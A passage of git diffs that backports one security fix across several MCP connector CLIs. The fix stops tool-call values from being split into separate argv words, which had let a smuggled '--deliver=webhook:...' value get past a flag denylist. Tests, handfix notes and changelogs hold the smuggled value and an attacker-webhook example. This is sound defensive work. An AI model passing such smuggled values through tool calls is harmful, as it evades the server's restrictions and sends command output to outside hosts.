+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/salesbuildr/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/salesbuildr/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/salesbuildr/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/salesbuildr/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/salesbuildr/handfixes.json
+++ b/skills/salesbuildr/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/salesbuildr/handfixes.json
+++ b/skills/salesbuildr/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/sentinelone/CHANGELOG.md
+++ b/skills/sentinelone/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-08-26
 
 ### Fixed

--- a/skills/sentinelone/CHANGELOG.md
+++ b/skills/sentinelone/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26
 

--- a/skills/sentinelone/CHANGELOG.md
+++ b/skills/sentinelone/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26

--- a/skills/sentinelone/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/sentinelone/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/sentinelone/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/sentinelone/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/sentinelone/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/sentinelone/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/sentinelone/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/sentinelone/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/sentinelone/handfixes.json
+++ b/skills/sentinelone/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/sentinelone/handfixes.json
+++ b/skills/sentinelone/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/servosity/CHANGELOG.md
+++ b/skills/servosity/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.6.3] - 2026-09-01

--- a/skills/servosity/CHANGELOG.md
+++ b/skills/servosity/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.6.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.6.3] - 2026-09-01
 
 ### Fixed

--- a/skills/servosity/CHANGELOG.md
+++ b/skills/servosity/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.6.3] - 2026-09-01
 

--- a/skills/servosity/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/servosity/cli/internal/mcp/cobratree/shellout.go
@@ -276,6 +276,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -285,10 +292,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -296,11 +303,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/servosity/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/servosity/cli/internal/mcp/cobratree/shellout_test.go
@@ -98,7 +98,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"receipt-file": true,
 		"token":        true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -127,7 +127,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -192,7 +192,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"json":    "true",
 		"output":  "/tmp/evil.json",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -410,7 +410,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -932,4 +932,113 @@ func toolResultContentText(result *mcplib.CallToolResult, index int) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
